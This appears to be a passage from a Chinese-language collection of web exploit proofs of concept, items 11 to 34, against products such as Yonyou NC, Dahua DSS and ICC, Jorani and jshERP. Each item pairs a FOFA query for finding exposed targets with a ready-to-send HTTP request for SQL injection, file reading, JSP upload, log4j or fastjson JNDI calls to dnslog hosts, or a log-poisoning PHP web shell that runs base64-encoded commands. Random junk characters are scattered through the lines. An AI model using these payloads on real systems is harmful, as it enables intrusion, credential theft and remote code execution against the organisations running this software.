9 y. q' u( Z( R5 E- `2 \- I8 e  V6 q" O
jmnqjfdsupxgfidopeixbgsxbf# Q* Z- d: R1 j6 ?; a# g: F+ b
------WebKitFormBoundaryxdgaqmqu--
% T$ W0 f/ I: p) `
6 T/ h6 U" L+ U; ~* Y% ]% t, k& d9 p
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入- G( S  I$ y! e  F
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
5 C" z. M1 b# Z9 {# H* eGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1+ f) f0 ~( e) b5 I6 G4 d, E; f
Host: 127.0.0.12 p' I. `& R: ^" g: z/ y0 F1 x
Pragma: no-cache3 b  S+ w4 A  H6 \) o
Cache-Control: no-cache
3 Q' \7 c8 H# O: N6 Z5 a  p  V! hUpgrade-Insecure-Requests: 1
, v( m. U; t- l. T$ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  j) |: X2 b4 x4 W2 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- m$ ?* V% F% N" B1 o8 {5 u1 K
Accept-Encoding: gzip, deflate0 r" l* k0 p; p% y$ E' @9 t. R( }
Accept-Language: zh-CN,zh;q=0.9,en;q=0.85 z  T/ c; G0 E; q' n3 F
Connection: close* ]+ W0 }: i+ i, C: V
, g& ~+ j9 u: y6 M4 A/ X6 C% o

$ W) ^& t% [+ ~: q" f3 `12. Jorani < 1.0.2 远程命令执行. {; x) r4 c0 V
FOFA:title="Jorani"% P2 F& q8 W2 o
第一步先拿到cookie' o4 {8 d* T5 [
GET /session/login HTTP/1.1
3 _& g+ E% k( U" jHost: 192.168.190.30& J; a! j% l5 C7 J
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
0 @6 R. o' L* m) WConnection: close. x- p$ F8 w0 n6 i/ A3 f2 X
Accept-Encoding: gzip
! I# v- U4 V! R0 D. T8 V3 Z0 T3 y- a6 k
( X  a- U" q2 N6 o* w4 C: l
响应中csrf_cookie_jorani用于后续请求
# [/ D; a: [) X$ A, o# FHTTP/1.1 200 OK
8 ^6 T) D& [) v1 s9 R4 tConnection: close. q9 }4 Z# I: |* Z6 Q7 H
Cache-Control: no-store, no-cache, must-revalidate% h5 _8 k2 m9 n) W. ~! T
Content-Type: text/html; charset=UTF-86 a: s7 m: B4 v
Date: Tue, 24 Oct 2023 09:34:28 GMT2 e. v2 w, s2 [& x5 t) C8 e1 r
Expires: Thu, 19 Nov 1981 08:52:00 GMT2 L  |  U  V4 f. E$ w6 N3 h& X
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
$ `, A/ ?1 l- _4 K& h  R/ hPragma: no-cache' |; D1 `7 Y3 f4 c  ^. G& V: L
Server: Apache/2.4.54 (Debian)4 f; n5 ]- \+ {9 |' s5 u9 s
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
, w5 }; ~. v9 e1 @Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly9 Q% y  Z+ I; I3 E% v1 f
Vary: Accept-Encoding
$ E) F, _. I# }
2 p. U2 `! e7 N% m, ~8 C2 U
/ _- C  g1 i  Y4 t4 }POST请求,执行函数并进行base64编码
2 F9 \3 N/ m0 O) ^* {7 T! l; r/ TPOST /session/login HTTP/1.1
8 s/ b  J8 o; u& |- x: _; V3 wHost: 192.168.190.30
6 y$ U5 h8 F  nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
: X& X5 _! L) m4 f( BConnection: close7 R) X/ p% G$ q1 f  u# b1 b
Content-Length: 252& o" C8 e/ z" R
Content-Type: application/x-www-form-urlencoded2 g9 Q% x4 p0 m' ^2 v
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
2 }9 V4 Q: w) P/ w1 }) L) C) J! w% zAccept-Encoding: gzip
2 o9 j, q8 z" S2 ~- U' V- u) V! P; _4 h" a) m; K# E
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
) q0 [( a9 g0 @! ^* K* ]! g/ G) L
/ v5 e+ t- W, ^+ H
. {; c4 I3 ^- g" g' c# N' F+ W2 A$ f
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串3 V7 c0 M& u9 j5 Q
GET /pages/view/log-2023-10-24 HTTP/1.1
- [5 L" D' A; S+ MHost: 192.168.190.30
4 K) W/ U8 C/ i; ~! G  A; qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! s3 K) n7 V( |* a- y
Connection: close
5 z% S! L$ ^1 \7 o% e" ZCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; Q0 M+ q0 l* V. @$ s% a0 D0 S8 E
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
5 A* A# S6 H" @X-REQUESTED-WITH: XMLHttpRequest$ U2 u4 x$ {1 S, C
Accept-Encoding: gzip; f: N* k6 R. h  Z

3 _, F4 E- Y, f) K# E3 Z7 A6 ?
1 W1 r, S6 z3 e* V13. 红帆iOffice ioFileDown任意文件读取5 g1 Z5 A4 M( l1 A. ^8 _  E
FOFA:app="红帆-ioffice"/ |3 R( d; x( \
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.15 g2 [% i8 h0 K# U- H
Host: x.x.x.x4 w$ Z9 |  b" v( t% @" }5 A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 h1 |) G/ V( x. t2 z
Connection: close
0 s1 ?0 u; R# `Accept: */*
3 G3 |1 o6 i+ {' p7 ?/ {Accept-Encoding: gzip0 u6 ~2 A" }& ]: q* t* \  k" }/ N$ U
; ~. E/ N/ e5 Y! O

1 x" C6 m3 y# f14. 华夏ERP(jshERP)敏感信息泄露
9 g+ Z( C2 t% ?" l+ {/ X  k' qFOFA:body="jshERP-boot"
9 @' T0 L  Q0 u泄露内容包括用户名密码
( E1 ~7 S: R, W% jGET /jshERP-boot/user/getAllList;.ico HTTP/1.1' X9 C5 y; `5 K
Host: x.x.x.x
5 X- D' A# E3 E) o5 p6 m# xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36. s  J- g  E9 r$ Q1 d0 {6 A
Connection: close4 f) i* ]& o7 \  m5 ?) V0 B
Accept: */*( Z1 `8 O, b# s* o9 `3 u- x# `
Accept-Language: en
: B0 f( m4 g: ?0 X& r3 ~1 ZAccept-Encoding: gzip
4 ^7 W3 A/ B4 B. C* r) K5 j: M
3 M: H& H3 c) A: U( R/ Q6 T, ?4 q6 A
, q% S) j2 Q% V* j7 z+ R" T7 J15. 华夏ERP getAllList信息泄露
' a7 E3 J  c9 ~+ R% @; VCVE-2024-0490) N$ S7 \5 y6 Z& J! j0 t" [
FOFA:body="jshERP-boot". z. a2 {4 g. u4 v2 \# c+ i5 ?
泄露内容包括用户名密码4 P4 x7 [) W; A, N
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
) S) H+ x4 o/ r* x' xHost: 192.168.40.130:100
' X! n0 j: H: z7 U$ V1 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
( s9 f) a- N  j' _, E2 wConnection: close! F; W+ ^) z( F/ o0 |" |3 L9 I  _  k4 \
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
: i% x+ X& P- x% V+ `Accept-Language: en- Y6 w. h5 g2 G* H
sec-ch-ua-platform: Windows
; b' R' D* E$ ]- T/ `Accept-Encoding: gzip
" w* l- c& E  _4 G+ ^5 T+ q4 @+ D
* P' k6 O/ d% x( e1 m1 q
16.  红帆HFOffice医微云SQL注入8 v9 w0 b, X2 o1 p* Z: d- L& ?" i
FOFA:title="HFOffice"
1 H: o% ]4 b# W& {, r. a% Dpoc中调用函数计算1234的md5值$ |! g1 }  D( r; P3 {& F7 K8 Y
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
- U1 Y; |  U( R$ J/ O7 U" jHost: x.x.x.x
) ~# U, s  V" Q& l7 |User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
% s1 C9 j& @+ l7 p5 EConnection: close
; l+ `; M  W2 k" PAccept: */*
# m* {2 ?% `  y8 z. iAccept-Language: en) U* m! j! E/ Z: B; r1 p
Accept-Encoding: gzip: q4 j$ V" W; p) ]# R0 U
1 A; R1 N, P3 A1 v* }/ ]! k

1 N" @" k) }! Z7 u17. 大华 DSS itcBulletin SQL 注入
7 G' b+ j$ d; j: }8 M  tFOFA:app="dahua-DSS"/ _; U/ ?" W2 k7 L4 j4 ?
POST /portal/services/itcBulletin?wsdl HTTP/1.12 [# s1 c, \4 l; a
Host: x.x.x.x
% w5 R& E* V7 C/ L& Q/ u8 i* AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. G. ^3 E$ H5 e% D( u# WConnection: close
  c3 R" l/ r2 o5 L# nContent-Length: 345
& W* g3 c% n2 k; ?7 }& K$ bAccept-Encoding: gzip
* _- v/ V# {# r& l1 `, [
- N0 K$ U4 Q7 i* Y+ M) h<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>2 l* ?( [7 C, R
<s11:Body>* j0 ~1 Y; p) T) c4 V
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
8 T/ o" T2 l: F      <netMarkings>
$ ~  i' J/ S' F: v9 ]! h' S( C$ `5 W4 B       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1% s9 @1 y2 ~5 b" T4 c  F& M! p0 D
      </netMarkings>! B' y# s# W9 v: W( g7 o/ i$ I" D
    </ns1:deleteBulletin>: A' v, [% c. ~: x
  </s11:Body>2 b% A! H) M/ _& T* y
</s11:Envelope>% z0 m9 w/ p' r# D# c9 ~  r( a8 q
! V; ^; X) d) m& x9 C5 D! q

9 p4 k: U3 u6 j  N18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ _$ R' X/ L3 V, U2 E  D3 N6 Z  [
FOFA:app="dahua-DSS"! X/ F- w$ D" b/ L2 n
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
% ?# u( D' a! L$ L7 GHost: your-ip
* ]. T* }- p5 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% s6 N8 b# V# J# K  k
Accept-Encoding: gzip, deflate2 z# y+ u% z  c5 P5 T* ]
Accept: */** Q; S4 M$ i; _8 o, T  w
Connection: keep-alive
( H' M4 K- x' x, ?: c% Y8 o# G- w: _, ^3 o7 {, n; S- A/ y6 ^

. s; U6 z$ g7 H* e
( ]2 e! r" A) S+ ]9 }5 \19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
5 m! F. w, J3 z& {: gFOFA:app="dahua-DSS"5 {4 Y- }; Q; T$ Z
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
8 F. G; C; ?! _: O' C2 VHost:
* F7 o: R( Q% x3 _! x+ KUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! E, v% J( J- f
Accept-Encoding: gzip, deflate& }+ j  X# ~, r3 Q4 ?/ e3 T/ H' s
Accept: */*4 O7 d5 k( B5 Z( [
Connection: keep-alive2 `8 h- e: ]3 c+ ]0 `8 e% r
4 s; ~9 S$ O2 B! r! o9 c
4 v" Z+ C- R3 J2 Z
20. 大华ICC智能物联综合管理平台任意文件读取
8 R5 _  A" o6 s3 b. E6 ?FOFA:body="*客户端会小于800*"
( S- |+ y. ]) p: X5 Q" i5 \! BGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
0 {* h9 N* u/ W: QHost: x.x.x.x, F  j1 k. Y9 f/ x4 ?1 U. p- Y/ |" r
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. ^) J: L  I6 ^* `9 j- oConnection: close
( d2 v/ v8 N/ d/ C- D3 }! X! w6 sAccept: */*
( [; `2 a9 A- N% M* O' B' k2 V4 IAccept-Language: en
5 J  \4 K% B, m/ J5 zAccept-Encoding: gzip
% W5 T0 ]( C" ^/ m$ ?. I$ y
2 C8 @' j! }- N9 \2 L% H' d8 m
/ i, \6 i$ J' b0 n% P  y9 P21. 大华ICC智能物联综合管理平台random远程代码执行
! b' T* v& B3 `FOFA:icon_hash="-1935899595"
* g# z; m( g$ z; k1 D, [POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1# V7 O1 m; K3 _% W
Host: x.x.x.x8 k7 h9 j( w; |8 @0 b& U8 ]4 W  c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ _( m1 b0 a3 K9 c6 m8 sContent-Length: 1619 z- E$ }( o/ ~, u& H2 _7 O
Accept-Encoding: gzip
1 y" s# A) x2 E6 R' R2 V, g2 I! aConnection: close
( ^) J- v2 j' S0 _7 w- AContent-Type: application/json;charset=utf-8
0 B# w% A& Q4 p# @
1 a% B; v7 |" W+ b: e1 a{
, Y; c( R0 h5 Q- t( J' o5 \"a":{& Z2 }5 [- \' ~% M0 W
   "@type":"com.alibaba.fastjson.JSONObject",( q, d7 C1 e4 [( c" s8 c% x
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
. b) _' E, D7 A8 [7 r/ G  l  }""
1 I/ q; r2 u% ?}
" h8 {2 h& B. `: c# x! P4 D4 L5 {% j) L% o% s% a) d1 p' G

9 g5 i4 e! `3 h. x+ F6 a22. 大华ICC智能物联综合管理平台 log4j远程代码执行
- v9 O" @/ i5 e* wFOFA:icon_hash="-1935899595"
0 Q/ X8 A( ]% h" k8 a6 ]$ I' G% ePOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1! ]+ k: E& ]. w3 f
Host: your-ip
5 @7 f* K+ `' ]# ?( hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. L+ j, J5 W- g8 k* y1 B, l
Content-Type: application/json;charset=utf-8
7 q6 M) ~0 ?/ h8 {; d( t
: x9 K; o2 \; v4 y{
) l* p/ o/ i9 o$ O, _"loginName":"${jndi:ldap://dnslog}"
3 W/ A+ l7 g& ]5 Z6 M! `/ q}
3 |8 m% ^1 Z7 L1 }* }( {( {4 w: H

( f: @+ M- X! _3 E# m/ ~9 U+ ^2 m$ a) w( C  P" V, D) [. g9 J
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- j6 R, L' F; I2 r4 g7 w/ rFOFA:icon_hash="-1935899595"
, X% ]: m6 @- j% E5 UPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1# A- K3 |6 z" j# e/ \3 C& V
Host: your-ip$ d* I9 p6 ?) ~) x$ o9 Z+ k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 U+ U! Y- ?2 Q: {
Content-Type: application/json;charset=utf-8
" L% A, q" m4 x' w1 MAccept-Encoding: gzip
0 ]$ `4 C1 O; J$ ZConnection: close& l* R  Z, y& D) v# E3 E
) S  ^5 E% K& ?- u, x! k  ?0 R
{: [1 e& @3 u7 Z; Q; f* H
    "a":{$ \3 A. M7 M  a: C! z8 S% d' X1 i
        "@type":"com.alibaba.fastjson.JSONObject",) Y* n  k6 }! G5 ^
       {"@type":"java.net.URL","val":"http://DNSLOG"}
) G1 x3 X3 n8 I1 ~4 S, O/ a# x        }""
9 g* T( l% a, G! i) E6 ?: o}) s9 n; ^- s' `2 j1 c( \1 `: i
1 s$ f8 n# T& t( g, K$ w% D: {
- a& D3 d7 r& T$ \5 g; n0 k
24. 用友NC 6.5 accept.jsp任意文件上传
- [. ~) Z" \$ K9 j) |! TFOFA:icon_hash="1085941792"  G" U: P+ x) J: F# g. R
POST /aim/equipmap/accept.jsp HTTP/1.1# |/ h' H, N' J. B
Host: x.x.x.x
# K, f! b( X! I% `6 K: sUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2 b$ _7 I" ]/ x/ s/ l1 R; OConnection: close( i+ x2 n" \7 U! i" P
Content-Length: 449- c/ X& \& m" K
Accept: */*
* i3 G* t/ d- W1 l4 F! ZAccept-Encoding: gzip! R& u8 R3 h9 h0 T$ ^0 X6 G2 N1 \2 i4 f
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc9 [$ I; o& A3 R) |2 p5 R+ O: n, g( A/ z

- n/ ~3 p6 ]/ k  s-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* a8 q( A: Z, F8 s. l, P
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
( s" s: r" `0 X2 A( t+ r, dContent-Type: text/plain
/ S* z4 L& R. a" ~
9 G) s$ ^* l7 s% T/ O<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>" i$ u! R" D2 E  ]8 e+ F  g
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
& Y2 C. g/ G8 ]2 pContent-Disposition: form-data; name="fname"0 E/ x) P# A. \, ~: B& Z8 ^( j# Q
5 h. [( g. G% a' O0 q' r6 F9 Z3 d
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp/ o: s) I# ^( e0 h) n% j3 i& {
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
' n$ n. |; s3 \: t; T' H$ D) M: y% X7 ]1 K0 S/ D9 T

% p' F# V+ O! D4 E- A  W! f25. 用友NC registerServlet JNDI 远程代码执行
' V+ J0 u& R, O3 B( ?FOFA:app="用友-UFIDA-NC"
! g9 v9 Y2 {+ a$ Q6 l* r; _# D2 f5 |POST /portal/registerServlet HTTP/1.1
- ^6 h2 o3 W: N' U$ q. C  EHost: your-ip
3 D2 b7 q9 h$ X* {! L5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 o: U$ {* M3 q$ S& |. hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9* X3 Z- R/ E9 @! m7 V5 S
Accept-Encoding: gzip, deflate
: L4 ~0 u( T! W- C- _0 R0 hAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.64 n# E/ I1 N  o8 V$ Z; Y
Content-Type: application/x-www-form-urlencoded$ m% i7 n6 ?3 f0 _% {

* b1 z2 G( q( a* ^- `  I# ytype=1&dsname=ldap://dnslog' m  Z$ Y+ W0 a6 N# F8 U
6 ^; h4 T7 X4 a# e4 ^8 h3 g
4 A) a* b3 K) L5 [: G9 n- R1 Y

1 P$ U4 c7 r- w8 X6 k26. 用友NC linkVoucher SQL注入% o1 j# o, z1 L8 I5 l7 X
FOFA:app="用友-UFIDA-NC"; `- c6 y+ I! s% r3 S
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: M/ M* q( h$ S1 GHost: your-ip
0 ^3 r2 Y: j6 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ c( q$ ?* B6 e# l' |
Content-Type: application/x-www-form-urlencoded  n; L# _, P% a! c' G& G
Accept-Encoding: gzip, deflate
: |2 {7 c0 S4 R+ M$ U/ W8 ~6 Y0 JAccept: */*
) c5 U# z( p9 z( U% eConnection: keep-alive# G* x+ O! i- j

$ I1 ~% V$ J1 y* Q8 P7 H# w; m& u: P" R7 W
27. 用友 NC showcontent SQL注入
+ |5 V2 ]$ h' m! q- G2 ~, a# MFOFA:icon_hash="1085941792", v% i! r0 t- B" V" M
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 N: ^6 e1 s1 f, t) _1 ~. M/ i
Host: your-ip
) A" g6 l8 U# k) H* w+ ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 z+ N0 @2 f& b1 d* Q. V
Accept-Encoding: identity& n& E7 V3 b' n+ H2 w$ i
Connection: close- s) ?; U; _2 O) B, u
Content-Type: text/xml; charset=utf-8# X! i! P. u3 d0 W. D: l
0 B/ w: ]" I8 a! d9 @3 r

$ T+ E1 g( g. k& i# K) Q28. 用友NC grouptemplet 任意文件上传
! a. j8 r  r6 ~& f$ S! CFOFA:icon_hash="1085941792"1 z! n( Q+ C6 p7 m0 |
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1( i; r' ]& q! W  W: W& ]: R
Host: x.x.x.x
3 Y+ M& C/ |2 p. [7 q* a: ~! k8 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! t1 f' d# t9 q2 `, SConnection: close
, A: C7 E8 e' t7 B# K' s- {Content-Length: 268
/ I, A( o' }( D6 Y; iContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk- Z6 r+ a- Y9 _  g( ~
Accept-Encoding: gzip1 x: F( @" c& {% N# A; r0 O9 `" [
0 @; L2 J' w4 H4 S/ h
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 h) ]$ ?! ]4 v* O, N! v: ]
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"6 c0 p* y3 _/ \) i! _) Q+ o
Content-Type: application/octet-stream5 O, Q  L0 v, y6 n, C7 _

6 u# }. Q* c; T. |4 r4 z<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>+ ]* i2 @4 ?6 M: ^$ h, M5 `7 S+ z* P
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--6 y: @; C+ R1 T9 o4 w+ Q

2 Z  P7 t$ X* k: r2 @9 A. @" J* h9 d& {5 D, W3 H& G
/uapim/static/pages/nc/head.jsp
7 O$ Z  V$ p+ [8 |, k7 t- d" ^- X0 v5 H, ^: b. f* n' L
29. 用友NC down/bill SQL注入$ V1 G# m1 E  |) Y2 O2 ]  @- E' E9 @
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ K* U" v0 o- J( e& s$ {, IGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
7 `- u, }" h9 h! F, bHost: your-ip
7 @9 G' A% T& u. GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; [# P! y- m& ^! M: Q+ Z
Content-Type: application/x-www-form-urlencoded: P6 w" o$ {/ P9 J
Accept-Encoding: gzip, deflate
+ R6 G8 {* c* r5 I! ?Accept: */*
4 m9 O, s* l# k$ Z! KConnection: keep-alive% ^4 N! N. s: G3 Z
& e. L/ ?2 v+ ]  a+ n* @9 r

2 z# h) K7 N( y* W) ^: {9 O30. 用友NC importPml SQL注入5 q# n% l( o; w
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 l8 I4 Z6 ?/ }' T6 B/ _# L
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1+ c  {6 b3 @$ m: V( c  H  c' i+ }
Host: your-ip
: o/ F0 P1 P: r5 g# N# d" [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
" u3 X+ g$ z) ], H6 j+ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, p# ]0 {% l& P3 j) v  J9 Q+ y
Connection: close
5 G( M' v) F- M$ I. j: u! T  j+ T( B; S# G
------WebKitFormBoundaryH970hbttBhoCyj9V
7 B  k/ z( N/ G9 T( W  BContent-Disposition: form-data; name="Filedata"; filename="1.jpg"" q7 r% C3 k. L; B( C* g8 b2 c
Content-Type: image/jpeg; E6 Y& l% E9 M2 f! g. r2 f
------WebKitFormBoundaryH970hbttBhoCyj9V--
5 m9 N' X( Y: n$ A, S2 k. D
. z' h2 d' N0 K4 s! j$ w6 P: B
31. 用友NC runStateServlet SQL注入
% [8 s$ h, i! c; P6 \. vversion<=6.5, L/ c6 C: i9 L. z3 \+ f% @
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 K& T# x  r( A1 l
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.19 R4 U" G# O" z
Host: host! ~, H7 h- V' C- D# H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ M7 |) h, D5 p0 T5 M4 I7 P  Z
Content-Type: application/x-www-form-urlencoded
2 E# ^7 t) q* H) }% D7 P1 N. D1 F" d0 E9 o' J
- u# X, h8 x: h+ x7 N& D& _
32. 用友NC complainbilldetail SQL注入4 e0 x$ A2 x, o+ q
version= NC633、NC65
8 p- s1 ^9 u$ aFOFA:app="用友-UFIDA-NC"
9 d0 w$ B) j" c5 v1 wGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1! i8 D& m! d7 K
Host: your-ip
$ Z- W0 L: U0 y. V8 r2 @7 g, zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) }5 Q# }, U  |: T8 j# L
Content-Type: application/x-www-form-urlencoded
  r: X( q0 u! v7 yAccept-Encoding: gzip, deflate# n# @9 N. P3 v
Accept: */*
; c' {- r2 p1 r" ~Connection: keep-alive; q6 L! r0 d0 h8 Z; E. Z
; b. h; Y& i/ D" E0 E/ |; n+ O

2 i- ?" }! ]5 l' E- W5 H0 ^9 \& x' |33. 用友NC downTax/download SQL注入2 I' b; P9 n  l7 O
version:NC6.5FOFA:app="用友-UFIDA-NC"
9 q# c8 s8 K1 z# J. x$ g5 K  n0 w" bGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" H- V3 [. Z' }4 V3 x; rHost: your-ip
' T# X! S% E7 G$ Q, C- e8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 Q& ?4 h. W) A# C, P; G  q) |Content-Type: application/x-www-form-urlencoded% ?4 V) m" M$ K+ t
Accept-Encoding: gzip, deflate' f$ R" n, n2 |# _9 M
Accept: */*- O6 R( w9 q3 `8 k
Connection: keep-alive
8 ]4 c4 L$ k% a3 i6 q$ K! y$ n' C; a

; O( ~# x0 Z* o34. 用友NC warningDetailInfo接口SQL注入' i; |) w9 t  S9 Y$ }
